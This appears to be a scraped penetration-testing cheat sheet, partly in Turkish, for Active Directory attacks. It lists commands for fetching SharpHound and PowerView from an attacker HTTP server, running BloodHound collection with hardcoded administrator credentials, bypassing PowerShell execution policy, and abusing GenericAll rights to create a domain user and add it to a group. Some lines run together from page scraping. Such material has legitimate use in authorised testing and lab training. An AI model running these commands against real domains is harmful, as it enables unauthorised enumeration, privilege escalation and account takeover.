LDAP (389,636)
Bloodhound
# Local Attack
updog 80
iwr -uri http://192.168.1.2/SharpHound.exe -Outfile SharpHound.exe
.\SharpHound.exe -c All
# Remote Attack
bloodhound-python -c all -ns 172.0.0.1 -d INLANEFREIGHT.LOCAL -u administrator -p 'password123' --zip
nxc ldap 192.168.1.1 -u administrator -p 'password123' --bloodhound --collection All
# Attacker
neo4j start # neo4j:neo4j
bloodhound
MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN pTehlikeli İzinler
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group
# GenericAll (Full Access)
net user john Password123 /domain
net group "Management Department" john /add /domain
runas /user:domain.local\john "cmd.exe"Poweview
cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
python -m http.server 80
iwr -uri http://192.168.1.2/PowerView.ps1 -Outfile PowerView.ps1
powershell -ep bypass
Import-Module .\PowerView.ps1
Get-NetDomain # Domain Bilgisi
Get-NetUser # Bütün Kullanıcılar
Get-NetUser -SPN | select samaccountname,serviceprincipalname # SPN
Get-NetUser | select cn # Sadece cn Özelliği
Get-NetGroup # Bütün Gruplar
Get-NetComputer # Computer Objects
Find-LocalAdminAccess # Domaindeki Bilgisayarda Admin Yetkimiz Varmı
Get-NetSession -ComputerName client74 # Session Kontrolü
Get-ObjectAcl -Identity stephanie # ACE Listeleme
Find-DomainShare # Share listeleme
Find-DomainShare -CheckShareAccess # Açılan SharelarLast updated